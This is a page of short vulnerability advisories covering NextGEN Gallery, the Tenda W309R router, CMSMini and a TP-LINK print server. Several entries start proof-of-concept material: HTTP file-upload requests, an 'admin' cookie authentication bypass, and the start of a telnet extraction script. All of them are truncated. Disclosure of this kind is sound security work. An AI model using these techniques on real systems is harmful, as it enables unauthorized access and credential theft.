advisories


May. 19, 2014

NextGEN Gallery 1.9.1 - Arbitrary File Upload

Description The NextGEN Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. Versions prior to NextGEN Gallery 2.0.63 are vulnerable. Impact An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application. Proof of Concept POST /index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name= HTTP/1.1 Host: target_ip User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.

Sep. 30, 2013

Tenda W309R Router 5.07.46 - Information Disclosure

Description Tenda Wireless Router W309R doesn’t have proper authentication for the web application console. Though the application asks for password, it has poor cookie management which allows a user to login even without providing the password. Application uses cookie value “admin” to access the private pages which reveals configuration details such as PPoE username, PPoE password, wireless authentication key, details of MAC addresses etc, in the source code. Affected firmware version is V5.

Sep. 6, 2013

CMSMini - Multiple Vulnerability

Description CMS Mini application is vulnerable to multiple security issues including arbitrary file upload, Cross Site Request Forgery and Cross Site Scripting. Impact To be updated Proof of Concept File Upload URL : http://[target/IP]/cmsmini/admin/index.php?path=&op=newitem POST /cmsmini/admin/index.php?path=&op=newitem HTTP/1.1 Host: 192.168.15.162 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.15.162/cmsmini/admin/index.php?path= Cookie: PHPSESSID=in6suoa2o1q8ilrtgovjdtcl52 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------219313096530417 Content-Length: 1130 -----------------------------219313096530417 Content-Disposition: form-data; name="imagefile"; filename="cmd.

Jun. 19, 2013

TP-LINK TL-PS110U Print Server Authentication Bypass

Description TP-LINK TL-PS110U Print Server is prone to a security-bypass vulnerability. The Print Server device runs a telnet service which enables an attacker to access the configuration details without authentication. The PoC can extract device name, MAC address, manufacture name, Printer model, and SNMP Community Strings. Impact An attacker can exploit this vulnerability to bypass the access restrictions and obtain sensitive information which can aid in further attacks. Proof of Concept import telnetlib import sys host = sys.